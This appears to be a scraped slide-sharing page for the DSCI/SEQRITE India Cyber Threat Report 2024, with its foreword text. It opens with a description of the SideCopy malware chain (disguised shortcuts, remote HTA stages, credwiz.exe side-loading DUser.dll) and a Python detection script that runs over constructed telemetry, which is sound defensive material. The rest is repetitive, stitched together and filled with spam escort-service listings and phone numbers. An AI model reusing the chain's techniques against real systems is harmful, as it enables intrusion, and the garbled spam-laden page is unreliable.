[Diagram: Depicting SideCopy: Double Action, Triple Infection, and a New RAT. Three RAR archives (RAR1, RAR2, RAR3) carry shortcuts disguised as DOCX, PNG and PDF; each launches a remote HTA (Stage-1), followed by HTA Stage-2 and Stage-3 and the preBotHta.dll loader stages, all run in-memory. Labels cdrzip.exe and cridviz.exe, "copies credwiz.exe and executes", and side-loading of Action RAT (DUser.dll, two variants); staging under %Public%\cdnews, %Public%\zxbrp and %Temp%, persistence via the Startup folder; hosted payloads and two C2 servers over ports 8080, 9813 and 9467; decoy files. Hosting domain and C2 IP labels omitted here.]
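The SideCopy chain described above (disguised shortcut, remote HTA, credwiz.exe copied out of System32 to side-load DUser.dll, Startup-folder persistence) turned into host-level detection logic, as an added example that is not the report's own code. It runs over constructed Sysmon-like events; mshta.exe as the HTA host, the host names, user paths and the example.invalid URL are assumptions, while the binary, DLL and staging-folder names come from the report's diagrams.

```python
"""Heuristic detection of a SideCopy-style chain: disguised LNK -> remote HTA ->
copied Windows binary side-loading a RAT DLL -> Startup persistence."""
import re
from collections import defaultdict

# Indicators taken from the report's SideCopy diagrams: HTA stages (run by mshta.exe),
# credwiz.exe copied out of System32 to side-load DUser.dll, staging under %Public%
# or %Temp%, and a Startup-folder persistence entry.
HTA_HOST = "mshta.exe"
SIDELOAD_HOSTS = {"credwiz.exe"}
SIDELOAD_DLLS = {"duser.dll"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("c:\\users\\public\\", "\\appdata\\local\\temp\\")
DOC_EXTS = {"pdf", "docx", "doc", "xlsx", "png"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
EXECUTION_STAGES = {"remote_hta", "sideload_host_outside_system32", "sideloaded_rat_dll"}
CHAIN_ORDER = ["disguised_lnk", "remote_hta", "sideload_host_copied",
               "sideload_host_outside_system32", "sideloaded_rat_dll", "startup_persistence"]


def _norm(path):
    """Lower-case, backslash-normalised path for case-insensitive matching."""
    return (path or "").replace("/", "\\").lower()


def _basename(path):
    return _norm(path).rsplit("\\", 1)[-1]


def is_disguised_shortcut(filename):
    """True for 'report.pdf.lnk'-style names: a shortcut posing as a document or image."""
    parts = _basename(filename).split(".")
    return len(parts) >= 3 and parts[-1] == "lnk" and parts[-2] in DOC_EXTS


def classify(event):
    """Map one event to the chain stage it evidences, or None if it looks benign."""
    etype = event.get("type")
    if etype == "file_create":
        target = _norm(event.get("target"))
        if is_disguised_shortcut(target):
            return "disguised_lnk"
        if "\\start menu\\programs\\startup\\" in target:
            return "startup_persistence"
        if _basename(target) in SIDELOAD_HOSTS and any(d in target for d in USER_WRITABLE):
            return "sideload_host_copied"
    elif etype == "process_create":
        image = _norm(event.get("image"))
        cmdline = event.get("cmdline") or ""  # keep forward slashes so the URL regex matches
        if _basename(image) == HTA_HOST and REMOTE_URL.search(cmdline):
            return "remote_hta"  # HTA fetched from a remote URL rather than a local file
        if _basename(image) in SIDELOAD_HOSTS and not image.startswith(SYSTEM_DIRS):
            return "sideload_host_outside_system32"
    elif etype == "image_load":
        loaded = _norm(event.get("image_loaded"))
        if _basename(loaded) in SIDELOAD_DLLS and not loaded.startswith(SYSTEM_DIRS):
            return "sideloaded_rat_dll"  # legitimate DLL name loaded from the wrong place
    return None


def correlate(events):
    """Group matched stages per host. 'chain' needs two or more distinct stages, one
    of them an execution stage; a lone hit is only 'suspicious'."""
    per_host = defaultdict(set)
    for event in events:
        stage = classify(event)
        if stage:
            per_host[event["host"]].add(stage)
    results = {}
    for host, stages in per_host.items():
        chain = len(stages) >= 2 and bool(stages & EXECUTION_STAGES)
        results[host] = {"stages": sorted(stages, key=CHAIN_ORDER.index),
                         "verdict": "chain" if chain else "suspicious"}
    return results


# Constructed telemetry (not real data): WS-01 replays the chain; WS-02 runs the
# legitimate credwiz.exe/DUser.dll pair from System32 and a local HTA and must not fire.
SAMPLE_EVENTS = [
    {"host": "WS-01", "type": "file_create",
     "target": r"C:\Users\alice\Downloads\DocScanner_Aug_2023.pdf.lnk"},
    {"host": "WS-01", "type": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/stage1.hta"},  # placeholder URL
    {"host": "WS-01", "type": "file_create", "target": r"C:\Users\Public\cdnews\credwiz.exe"},
    {"host": "WS-01", "type": "process_create", "image": r"C:\Users\Public\cdnews\credwiz.exe"},
    {"host": "WS-01", "type": "image_load", "image": r"C:\Users\Public\cdnews\credwiz.exe",
     "image_loaded": r"C:\Users\Public\cdnews\DUser.dll"},
    {"host": "WS-01", "type": "file_create", "target": r"C:\Users\alice\AppData\Roaming"
     r"\Microsoft\Windows\Start Menu\Programs\Startup\cdnews.lnk"},
    {"host": "WS-02", "type": "process_create", "image": r"C:\Windows\System32\credwiz.exe"},
    {"host": "WS-02", "type": "image_load", "image": r"C:\Windows\System32\credwiz.exe",
     "image_loaded": r"C:\Windows\System32\DUser.dll"},
    {"host": "WS-02", "type": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Tools\inventory.hta"},
]

if __name__ == "__main__":
    for host, result in correlate(SAMPLE_EVENTS).items():
        print(host, result["verdict"], ", ".join(result["stages"]))
```

Each stage alone is weak evidence (credwiz.exe legitimately loads DUser.dll from System32), so the verdict is only raised to "chain" when several stages co-occur on one host.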
India Cyber Threat Report of 2024 with year
India Cyber Threat Report of 2024 with year
India Cyber Threat Report of 2024 with year
India Cyber Threat Report of 2024 with year
India Cyber Threat Report of 2024 with year
India Cyber Threat Report of 2024 with year
India Cyber Threat Report of 2024 with year
India Cyber Threat Report of 2024 with year
India Cyber Threat Report of 2024 with year
India Cyber Threat Report of 2024 with year
India Cyber Threat Report of 2024 with year
India Cyber Threat Report of 2024 with year

More Related Content

Similar to India Cyber Threat Report of 2024 with year

Deepfake Technology's Emergence: Exploring Its Impact on Cybersecurity
Deepfake Technology's Emergence: Exploring Its Impact on CybersecurityDeepfake Technology's Emergence: Exploring Its Impact on Cybersecurity
Deepfake Technology's Emergence: Exploring Its Impact on Cybersecurity
PC Doctors NET
 
The importance of understanding the global cybersecurity index
The importance of understanding the global cybersecurity indexThe importance of understanding the global cybersecurity index
The importance of understanding the global cybersecurity index
ShivamSharma909
 
Security - intelligence - maturity-model-ciso-whitepaper
Security - intelligence - maturity-model-ciso-whitepaperSecurity - intelligence - maturity-model-ciso-whitepaper
Security - intelligence - maturity-model-ciso-whitepaper
CMR WORLD TECH
 
The 10 Fastest Growing Cyber Security Companies of 2017
The 10 Fastest Growing Cyber Security Companies of 2017The 10 Fastest Growing Cyber Security Companies of 2017
The 10 Fastest Growing Cyber Security Companies of 2017
Insights success media and technology pvt ltd
 
cyberready-solutions
cyberready-solutionscyberready-solutions
cyberready-solutions
Noah Kline
 
A Comprehensive Review of Cyber Security, Threats and Cyber Attacks
A Comprehensive Review of Cyber Security, Threats and Cyber AttacksA Comprehensive Review of Cyber Security, Threats and Cyber Attacks
A Comprehensive Review of Cyber Security, Threats and Cyber Attacks
IRJET Journal
 
REPORT USE OF CYBERSECURITY.pptx
REPORT USE OF CYBERSECURITY.pptxREPORT USE OF CYBERSECURITY.pptx
REPORT USE OF CYBERSECURITY.pptx
eresavenzon
 
India's Leading Cyber Security Companies to Watch.pdf
India's Leading Cyber Security Companies to Watch.pdfIndia's Leading Cyber Security Companies to Watch.pdf
India's Leading Cyber Security Companies to Watch.pdf
insightssuccess2
 
Cyber threat Intelligence Dubai - Ahad.pptx
Cyber threat Intelligence Dubai - Ahad.pptxCyber threat Intelligence Dubai - Ahad.pptx
Cyber threat Intelligence Dubai - Ahad.pptx
Ahad
 
40 under 40 in cybersecurity. top cyber news magazine
40 under 40 in cybersecurity. top cyber news magazine40 under 40 in cybersecurity. top cyber news magazine
40 under 40 in cybersecurity. top cyber news magazine
Bradford Sims
 
40 under 40 in Cybersecurity 2022. Top Cyber News MAGAZINE
40 under 40 in Cybersecurity 2022. Top Cyber News MAGAZINE40 under 40 in Cybersecurity 2022. Top Cyber News MAGAZINE
40 under 40 in Cybersecurity 2022. Top Cyber News MAGAZINE
TopCyberNewsMAGAZINE
 
The Unconventional Guide to Cyber Threat Intelligence - Ahad.pdf
The Unconventional Guide to Cyber Threat Intelligence - Ahad.pdfThe Unconventional Guide to Cyber Threat Intelligence - Ahad.pdf
The Unconventional Guide to Cyber Threat Intelligence - Ahad.pdf
Ahad
 
Commercial Real Estate - Cyber Risk 2020
Commercial Real Estate - Cyber Risk 2020Commercial Real Estate - Cyber Risk 2020
Commercial Real Estate - Cyber Risk 2020
CBIZ, Inc.
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
A STUDY ON CYBER SECURITY AND ITS RISKS K. Jenifer
A STUDY ON CYBER SECURITY AND ITS RISKS  K. JeniferA STUDY ON CYBER SECURITY AND ITS RISKS  K. Jenifer
A STUDY ON CYBER SECURITY AND ITS RISKS K. Jenifer
AM Publications
 
An Analytical Study on Attacks and Threats in Cyber Security and its Evolving...
An Analytical Study on Attacks and Threats in Cyber Security and its Evolving...An Analytical Study on Attacks and Threats in Cyber Security and its Evolving...
An Analytical Study on Attacks and Threats in Cyber Security and its Evolving...
ijtsrd
 
Top cybersecurity trends to adapt in 2022
Top cybersecurity trends to adapt in 2022Top cybersecurity trends to adapt in 2022
Top cybersecurity trends to adapt in 2022
Cigniti Technologies Ltd
 
Mobile Security: Preparing for the 2017 Threat Landscape
Mobile Security: Preparing for the 2017 Threat LandscapeMobile Security: Preparing for the 2017 Threat Landscape
Mobile Security: Preparing for the 2017 Threat Landscape
BlackBerry
 
Volume2 chapter1 security
Volume2 chapter1 securityVolume2 chapter1 security
Volume2 chapter1 security
at MicroFocus Italy ❖✔
 
What are top 7 cyber security trends for 2020
What are top 7 cyber security trends for 2020What are top 7 cyber security trends for 2020
What are top 7 cyber security trends for 2020
TestingXperts
 

Similar to India Cyber Threat Report of 2024 with year (20)

Deepfake Technology's Emergence: Exploring Its Impact on Cybersecurity
Deepfake Technology's Emergence: Exploring Its Impact on CybersecurityDeepfake Technology's Emergence: Exploring Its Impact on Cybersecurity
Deepfake Technology's Emergence: Exploring Its Impact on Cybersecurity
 
The importance of understanding the global cybersecurity index
The importance of understanding the global cybersecurity indexThe importance of understanding the global cybersecurity index
The importance of understanding the global cybersecurity index
 
Security - intelligence - maturity-model-ciso-whitepaper
Security - intelligence - maturity-model-ciso-whitepaperSecurity - intelligence - maturity-model-ciso-whitepaper
Security - intelligence - maturity-model-ciso-whitepaper
 
The 10 Fastest Growing Cyber Security Companies of 2017
The 10 Fastest Growing Cyber Security Companies of 2017The 10 Fastest Growing Cyber Security Companies of 2017
The 10 Fastest Growing Cyber Security Companies of 2017
 
cyberready-solutions
cyberready-solutionscyberready-solutions
cyberready-solutions
 
A Comprehensive Review of Cyber Security, Threats and Cyber Attacks
A Comprehensive Review of Cyber Security, Threats and Cyber AttacksA Comprehensive Review of Cyber Security, Threats and Cyber Attacks
A Comprehensive Review of Cyber Security, Threats and Cyber Attacks
 
REPORT USE OF CYBERSECURITY.pptx
REPORT USE OF CYBERSECURITY.pptxREPORT USE OF CYBERSECURITY.pptx
REPORT USE OF CYBERSECURITY.pptx
 
India's Leading Cyber Security Companies to Watch.pdf
India's Leading Cyber Security Companies to Watch.pdfIndia's Leading Cyber Security Companies to Watch.pdf
India's Leading Cyber Security Companies to Watch.pdf
 
Cyber threat Intelligence Dubai - Ahad.pptx
Cyber threat Intelligence Dubai - Ahad.pptxCyber threat Intelligence Dubai - Ahad.pptx
Cyber threat Intelligence Dubai - Ahad.pptx
 
40 under 40 in cybersecurity. top cyber news magazine
40 under 40 in cybersecurity. top cyber news magazine40 under 40 in cybersecurity. top cyber news magazine
40 under 40 in cybersecurity. top cyber news magazine
 
40 under 40 in Cybersecurity 2022. Top Cyber News MAGAZINE
40 under 40 in Cybersecurity 2022. Top Cyber News MAGAZINE40 under 40 in Cybersecurity 2022. Top Cyber News MAGAZINE
40 under 40 in Cybersecurity 2022. Top Cyber News MAGAZINE
 
The Unconventional Guide to Cyber Threat Intelligence - Ahad.pdf
The Unconventional Guide to Cyber Threat Intelligence - Ahad.pdfThe Unconventional Guide to Cyber Threat Intelligence - Ahad.pdf
The Unconventional Guide to Cyber Threat Intelligence - Ahad.pdf
 
Commercial Real Estate - Cyber Risk 2020
Commercial Real Estate - Cyber Risk 2020Commercial Real Estate - Cyber Risk 2020
Commercial Real Estate - Cyber Risk 2020
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
A STUDY ON CYBER SECURITY AND ITS RISKS K. Jenifer
A STUDY ON CYBER SECURITY AND ITS RISKS  K. JeniferA STUDY ON CYBER SECURITY AND ITS RISKS  K. Jenifer
A STUDY ON CYBER SECURITY AND ITS RISKS K. Jenifer
 
An Analytical Study on Attacks and Threats in Cyber Security and its Evolving...
An Analytical Study on Attacks and Threats in Cyber Security and its Evolving...An Analytical Study on Attacks and Threats in Cyber Security and its Evolving...
An Analytical Study on Attacks and Threats in Cyber Security and its Evolving...
 
Top cybersecurity trends to adapt in 2022
Top cybersecurity trends to adapt in 2022Top cybersecurity trends to adapt in 2022
Top cybersecurity trends to adapt in 2022
 
Mobile Security: Preparing for the 2017 Threat Landscape
Mobile Security: Preparing for the 2017 Threat LandscapeMobile Security: Preparing for the 2017 Threat Landscape
Mobile Security: Preparing for the 2017 Threat Landscape
 
Volume2 chapter1 security
Volume2 chapter1 securityVolume2 chapter1 security
Volume2 chapter1 security
 
What are top 7 cyber security trends for 2020
What are top 7 cyber security trends for 2020What are top 7 cyber security trends for 2020
What are top 7 cyber security trends for 2020
 

Recently uploaded

Celebrity Navi Mumbai Call Girls 🥰 9967584737 🥰 Escorts Service Available Mumbai
Celebrity Navi Mumbai Call Girls 🥰 9967584737 🥰 Escorts Service Available MumbaiCelebrity Navi Mumbai Call Girls 🥰 9967584737 🥰 Escorts Service Available Mumbai
Celebrity Navi Mumbai Call Girls 🥰 9967584737 🥰 Escorts Service Available Mumbai
komal sharman06
 
High Profile Call Girls Bangalore ✔ 9352988975 ✔ Hi I Am Divya Vip Call Girl ...
High Profile Call Girls Bangalore ✔ 9352988975 ✔ Hi I Am Divya Vip Call Girl ...High Profile Call Girls Bangalore ✔ 9352988975 ✔ Hi I Am Divya Vip Call Girl ...
High Profile Call Girls Bangalore ✔ 9352988975 ✔ Hi I Am Divya Vip Call Girl ...
hina sharma$A17
 
Cyber Crime with basics and knowledge to cyber sphere
Cyber Crime with basics and knowledge to cyber sphereCyber Crime with basics and knowledge to cyber sphere
Cyber Crime with basics and knowledge to cyber sphere
RISHIKCHAUDHARY2
 
HistorySrSec2024 daahi sadhin sgg-25.pdf
HistorySrSec2024 daahi sadhin sgg-25.pdfHistorySrSec2024 daahi sadhin sgg-25.pdf
HistorySrSec2024 daahi sadhin sgg-25.pdf
AdiySgh
 
Call Girls Service Ahmedabad 🔥 7737669865 🔥 Available Nearby Escort Is Live R...
Call Girls Service Ahmedabad 🔥 7737669865 🔥 Available Nearby Escort Is Live R...Call Girls Service Ahmedabad 🔥 7737669865 🔥 Available Nearby Escort Is Live R...
Call Girls Service Ahmedabad 🔥 7737669865 🔥 Available Nearby Escort Is Live R...
SANIYA KHATUN$S2
 
Bangalore Call Girls 9079923931 With -Cuties' Hot Call Girls
Bangalore Call Girls 9079923931 With -Cuties' Hot Call GirlsBangalore Call Girls 9079923931 With -Cuties' Hot Call Girls
Bangalore Call Girls 9079923931 With -Cuties' Hot Call Girls
narwatsonia7
 
❣Ramp Model Call Girls Chennai 💯Call Us 🔝 7737669865 🔝💃Independent Chennai Es...
❣Ramp Model Call Girls Chennai 💯Call Us 🔝 7737669865 🔝💃Independent Chennai Es...❣Ramp Model Call Girls Chennai 💯Call Us 🔝 7737669865 🔝💃Independent Chennai Es...
❣Ramp Model Call Girls Chennai 💯Call Us 🔝 7737669865 🔝💃Independent Chennai Es...
tiktokhotymodel
 
Tesla Humanoid Robot - PPT in 11 Simple Slide
Tesla Humanoid Robot - PPT in 11 Simple SlideTesla Humanoid Robot - PPT in 11 Simple Slide
Tesla Humanoid Robot - PPT in 11 Simple Slide
abzjkr
 
Top 10 Digital Marketing Trends in 2024 You Should Know
Top 10 Digital Marketing Trends in 2024 You Should KnowTop 10 Digital Marketing Trends in 2024 You Should Know
Top 10 Digital Marketing Trends in 2024 You Should Know
Markonik
 
Decentralized Justice in Gaming and Esports
Decentralized Justice in Gaming and EsportsDecentralized Justice in Gaming and Esports
Decentralized Justice in Gaming and Esports
Federico Ast
 
'Secure and Sustainable Internet Infrastructure for Emerging Technologies'
'Secure and Sustainable Internet Infrastructure for Emerging Technologies''Secure and Sustainable Internet Infrastructure for Emerging Technologies'
'Secure and Sustainable Internet Infrastructure for Emerging Technologies'
APNIC
 
Unlimited Short Call Girls Mumbai ✅ 9833363713 FULL CASH PAYMENT
Unlimited Short Call Girls Mumbai ✅ 9833363713 FULL CASH PAYMENTUnlimited Short Call Girls Mumbai ✅ 9833363713 FULL CASH PAYMENT
Unlimited Short Call Girls Mumbai ✅ 9833363713 FULL CASH PAYMENT
rajesh344555
 
169+ Call Girls In Navi Mumbai | 9930245274 | Reliability Escort Service Near...
169+ Call Girls In Navi Mumbai | 9930245274 | Reliability Escort Service Near...169+ Call Girls In Navi Mumbai | 9930245274 | Reliability Escort Service Near...
169+ Call Girls In Navi Mumbai | 9930245274 | Reliability Escort Service Near...
tanichadda371 #v08
 
40 questions/answer Azure Interview Questions
40 questions/answer Azure Interview Questions40 questions/answer Azure Interview Questions
40 questions/answer Azure Interview Questions
mohammedbouna1
 
KubeCon & CloudNative Con 2024 Artificial Intelligent
KubeCon & CloudNative Con 2024 Artificial IntelligentKubeCon & CloudNative Con 2024 Artificial Intelligent
KubeCon & CloudNative Con 2024 Artificial Intelligent
Emre Gündoğdu
 
一比一原版(uofr学位证书)罗切斯特大学毕业证如何办理
一比一原版(uofr学位证书)罗切斯特大学毕业证如何办理一比一原版(uofr学位证书)罗切斯特大学毕业证如何办理
一比一原版(uofr学位证书)罗切斯特大学毕业证如何办理
adocd
 
VVIP Call Girls💯Call Us {{ 7374876321 }} 🔝 💃 Independent Female Escort Service
VVIP Call Girls💯Call Us {{ 7374876321 }} 🔝 💃 Independent Female Escort ServiceVVIP Call Girls💯Call Us {{ 7374876321 }} 🔝 💃 Independent Female Escort Service
VVIP Call Girls💯Call Us {{ 7374876321 }} 🔝 💃 Independent Female Escort Service
graggunno
 
Unlimited Short Call Girls Navi Mumbai ✅ 9967824496 FULL CASH PAYMENT
Unlimited Short Call Girls Navi Mumbai ✅ 9967824496 FULL CASH PAYMENTUnlimited Short Call Girls Navi Mumbai ✅ 9967824496 FULL CASH PAYMENT
Unlimited Short Call Girls Navi Mumbai ✅ 9967824496 FULL CASH PAYMENT
rajesh344555
 
🔥Call Girls In Chandigarh 💯Call Us 🔝 6350257716 🔝💃Top Class Call Girl Service...
🔥Call Girls In Chandigarh 💯Call Us 🔝 6350257716 🔝💃Top Class Call Girl Service...🔥Call Girls In Chandigarh 💯Call Us 🔝 6350257716 🔝💃Top Class Call Girl Service...
🔥Call Girls In Chandigarh 💯Call Us 🔝 6350257716 🔝💃Top Class Call Girl Service...
THE MOST
 
VVIP Call Girls Kolkata💯Call Us 🔝 7374876321 🔝 💃 Independent Female Escort Se...
VVIP Call Girls Kolkata💯Call Us 🔝 7374876321 🔝 💃 Independent Female Escort Se...VVIP Call Girls Kolkata💯Call Us 🔝 7374876321 🔝 💃 Independent Female Escort Se...
VVIP Call Girls Kolkata💯Call Us 🔝 7374876321 🔝 💃 Independent Female Escort Se...
graggunno
 

Recently uploaded (20)

Celebrity Navi Mumbai Call Girls 🥰 9967584737 🥰 Escorts Service Available Mumbai
Celebrity Navi Mumbai Call Girls 🥰 9967584737 🥰 Escorts Service Available MumbaiCelebrity Navi Mumbai Call Girls 🥰 9967584737 🥰 Escorts Service Available Mumbai
Celebrity Navi Mumbai Call Girls 🥰 9967584737 🥰 Escorts Service Available Mumbai
 
High Profile Call Girls Bangalore ✔ 9352988975 ✔ Hi I Am Divya Vip Call Girl ...
High Profile Call Girls Bangalore ✔ 9352988975 ✔ Hi I Am Divya Vip Call Girl ...High Profile Call Girls Bangalore ✔ 9352988975 ✔ Hi I Am Divya Vip Call Girl ...
High Profile Call Girls Bangalore ✔ 9352988975 ✔ Hi I Am Divya Vip Call Girl ...
 
Cyber Crime with basics and knowledge to cyber sphere
Cyber Crime with basics and knowledge to cyber sphereCyber Crime with basics and knowledge to cyber sphere
Cyber Crime with basics and knowledge to cyber sphere
 
HistorySrSec2024 daahi sadhin sgg-25.pdf
HistorySrSec2024 daahi sadhin sgg-25.pdfHistorySrSec2024 daahi sadhin sgg-25.pdf
HistorySrSec2024 daahi sadhin sgg-25.pdf
 
Call Girls Service Ahmedabad 🔥 7737669865 🔥 Available Nearby Escort Is Live R...
Call Girls Service Ahmedabad 🔥 7737669865 🔥 Available Nearby Escort Is Live R...Call Girls Service Ahmedabad 🔥 7737669865 🔥 Available Nearby Escort Is Live R...
Call Girls Service Ahmedabad 🔥 7737669865 🔥 Available Nearby Escort Is Live R...
 
Bangalore Call Girls 9079923931 With -Cuties' Hot Call Girls
Bangalore Call Girls 9079923931 With -Cuties' Hot Call GirlsBangalore Call Girls 9079923931 With -Cuties' Hot Call Girls
Bangalore Call Girls 9079923931 With -Cuties' Hot Call Girls
 
❣Ramp Model Call Girls Chennai 💯Call Us 🔝 7737669865 🔝💃Independent Chennai Es...
❣Ramp Model Call Girls Chennai 💯Call Us 🔝 7737669865 🔝💃Independent Chennai Es...❣Ramp Model Call Girls Chennai 💯Call Us 🔝 7737669865 🔝💃Independent Chennai Es...
❣Ramp Model Call Girls Chennai 💯Call Us 🔝 7737669865 🔝💃Independent Chennai Es...
 
Tesla Humanoid Robot - PPT in 11 Simple Slide
Tesla Humanoid Robot - PPT in 11 Simple SlideTesla Humanoid Robot - PPT in 11 Simple Slide
Tesla Humanoid Robot - PPT in 11 Simple Slide
 
Top 10 Digital Marketing Trends in 2024 You Should Know
Top 10 Digital Marketing Trends in 2024 You Should KnowTop 10 Digital Marketing Trends in 2024 You Should Know
Top 10 Digital Marketing Trends in 2024 You Should Know
 
Decentralized Justice in Gaming and Esports
Decentralized Justice in Gaming and EsportsDecentralized Justice in Gaming and Esports
Decentralized Justice in Gaming and Esports
 
'Secure and Sustainable Internet Infrastructure for Emerging Technologies'
'Secure and Sustainable Internet Infrastructure for Emerging Technologies''Secure and Sustainable Internet Infrastructure for Emerging Technologies'
'Secure and Sustainable Internet Infrastructure for Emerging Technologies'
 
Unlimited Short Call Girls Mumbai ✅ 9833363713 FULL CASH PAYMENT
Unlimited Short Call Girls Mumbai ✅ 9833363713 FULL CASH PAYMENTUnlimited Short Call Girls Mumbai ✅ 9833363713 FULL CASH PAYMENT
Unlimited Short Call Girls Mumbai ✅ 9833363713 FULL CASH PAYMENT
 
169+ Call Girls In Navi Mumbai | 9930245274 | Reliability Escort Service Near...
169+ Call Girls In Navi Mumbai | 9930245274 | Reliability Escort Service Near...169+ Call Girls In Navi Mumbai | 9930245274 | Reliability Escort Service Near...
169+ Call Girls In Navi Mumbai | 9930245274 | Reliability Escort Service Near...
 
40 questions/answer Azure Interview Questions
40 questions/answer Azure Interview Questions40 questions/answer Azure Interview Questions
40 questions/answer Azure Interview Questions
 
KubeCon & CloudNative Con 2024 Artificial Intelligent
KubeCon & CloudNative Con 2024 Artificial IntelligentKubeCon & CloudNative Con 2024 Artificial Intelligent
KubeCon & CloudNative Con 2024 Artificial Intelligent
 
一比一原版(uofr学位证书)罗切斯特大学毕业证如何办理
一比一原版(uofr学位证书)罗切斯特大学毕业证如何办理一比一原版(uofr学位证书)罗切斯特大学毕业证如何办理
一比一原版(uofr学位证书)罗切斯特大学毕业证如何办理
 
VVIP Call Girls💯Call Us {{ 7374876321 }} 🔝 💃 Independent Female Escort Service
VVIP Call Girls💯Call Us {{ 7374876321 }} 🔝 💃 Independent Female Escort ServiceVVIP Call Girls💯Call Us {{ 7374876321 }} 🔝 💃 Independent Female Escort Service
VVIP Call Girls💯Call Us {{ 7374876321 }} 🔝 💃 Independent Female Escort Service
 
Unlimited Short Call Girls Navi Mumbai ✅ 9967824496 FULL CASH PAYMENT
Unlimited Short Call Girls Navi Mumbai ✅ 9967824496 FULL CASH PAYMENTUnlimited Short Call Girls Navi Mumbai ✅ 9967824496 FULL CASH PAYMENT
Unlimited Short Call Girls Navi Mumbai ✅ 9967824496 FULL CASH PAYMENT
 
🔥Call Girls In Chandigarh 💯Call Us 🔝 6350257716 🔝💃Top Class Call Girl Service...
🔥Call Girls In Chandigarh 💯Call Us 🔝 6350257716 🔝💃Top Class Call Girl Service...🔥Call Girls In Chandigarh 💯Call Us 🔝 6350257716 🔝💃Top Class Call Girl Service...
🔥Call Girls In Chandigarh 💯Call Us 🔝 6350257716 🔝💃Top Class Call Girl Service...
 
VVIP Call Girls Kolkata💯Call Us 🔝 7374876321 🔝 💃 Independent Female Escort Se...
VVIP Call Girls Kolkata💯Call Us 🔝 7374876321 🔝 💃 Independent Female Escort Se...VVIP Call Girls Kolkata💯Call Us 🔝 7374876321 🔝 💃 Independent Female Escort Se...
VVIP Call Girls Kolkata💯Call Us 🔝 7374876321 🔝 💃 Independent Female Escort Se...
 

India Cyber Threat Report of 2024 with year

  • 2. Copyright ©2023 All rights reserved. This report has been jointly developed by Data Security Council of India (DSCI) and SEQRITE. The information contained herein has been obtained or derived from sources believed by DSCI and SEQRITE to be reliable. However, DSCI and SEQRITE disclaims all warranties as to the accuracy, completeness, or adequacy of such information. We shall bear no liability for errors, omissions or inadequacies in the information contained herein, or for interpretations thereof. The information contain herein should not be relied upon as a substitute for specific professional advice. Professional advice should always be sought before taking any action based on the information provided. The material in this publication is copyrighted. You may not, distribute, modify, transmit, reuse, or use the contents of the report for public or commercial purposes, including the text, images, presentations, etc. without prior consent from either DSCI and/or SEQRITE.
  • 3. FOREWORD – DSCI The report meticulously delineates prominent classifications of malware and their consequential impacts, providing insights into both network and host-based exploitations, Android-specific detections, zero-day vulnerabilities pertinent to the Indian context. The featured stories in the report offer in- depth narratives on prevalent cyber threats. These narratives dissect cryptojacking exploits, anti-forensic activities, advanced persistent threats, and various malicious activities targeting specific sectors and technologies. The report concludes with a glimpse into the future, providing predictions and insights into cyber threats anticipated for 2024, empowering us to stay ahead in our security measures. It serves as a compass, guiding our actions and fortifying our cybersecurity posture. VINAYAK GODSE Chief Executive Officer, Data Security Council of India to conduct a detailed study of India’s cyber threat landscape and present our analysis very specific to Indian context covering the states, cities, and industry segments. Malware stands as a significant peril to the integrity of digital systems, with cybercriminals engineering increasingly intricate and diverse attack methodologies. Every day, over half a million instances of malware are discovered, adding to the already staggering one billion circulating malware programs. As depicted in the report, there is a significant rise in behaviour-based detection compared to signature-based detections owing to the surge in constantly mutating malware variants such as polymorphic malware, zero-day exploits, fileless attacks. The report delves into serious threats posed by ransomware attacks. It is evident from the analysis that ransomware hit rate is higher compared to other malware categories as ransomware detection is still evolving. 
The geographical analysis presents the top states and cities with highest detection; however, it also underlines the fact that BYOD, work from home trends resulting in Tier II/ III cities are in the ambit of cyberattacks. The digitization drive across industry segments is exposing traditional industries such as automobiles, manufacturing, healthcare to cyber threats. As India advances its digitalization efforts across sectors, a pervasive outbreak of cyberattacks has inflicted substantial financial losses on businesses. Cybersecurity has ascended to a strategic concern at the board level owing to the multifaceted nature of cyber threats and the escalating monetary repercussions stemming from data breaches. For the purpose of this report, DSCI in collaboration with SEQRITE analysed approximately 400 million malware detections from over 8.5 million SEQRITE endpoint installations in India. Our objective was
  • 4. FOREWORD – QUICK HEAL I thank the entire team at DSCI and experts at our Labs to have researched and published threat intelligence for the Indian market. This report will dive deeply into the world of ever evolving threats in the Indian context, share predictions and recommendations for individuals, businesses and government organizations to stay a step ahead of prevalent risks during current and future times. Backed by our patents and international certifications and a legacy of nearly three decades, our award-winning solutions are truly made-in-India for the world. I am confident that with our rigorous R&D efforts, focus to innovate future-ready technologies, and round-the-clock technical support, our solutions are capable of mitigating new and emerging threats. Our commitment to securing India goes hand in hand with our dedication towards innovation thereby creating solutions that promise a sustainable future. Our insights forged at our Labs form the cornerstone of our deep understanding of the evolving threat landscape. Recently, our team has patched two Zero Day vulnerabilities and is the only cybersecurity solution provider world over to have found a solution for Expiro Infector. In addition, we are the first and only Indian company to have been invited to collaborate with the Govt. of USA on NIST-NCCOE’s Data Classification Project. I take immense pride in our role as guardians of the critical infrastructure of our nation through our enterprise cybersecurity brand, SEQRITE. Safeguarding the digital backbone of our country is not just a responsibility; it’s a commitment to ensuring the resilience of our nation in the face of evolving cyber threats. As we navigate the ever-changing digital age, SEQRITE remains steadfast in its commitment to innovation, simplification, and securing all. Sincerely, DR. SANJAY KATKAR Jt. 
Managing Director, Quick Heal Technologies Limited In line with the Hon’ble Prime Minister, Shri Narendra Modi’s vision of cyber-safe India, at SEQRITE, the enterprise cybersecurity arm of Quick Heal, we envision a future where cyber safety is not just a privilege but a fundamental right for all. It is with great pride and a sense of responsibility that I share with you deep insights derived from the country’s largest Malware analysis lab, SEQRITE Labs, in collaboration with Data Security Council of India (DSCI).
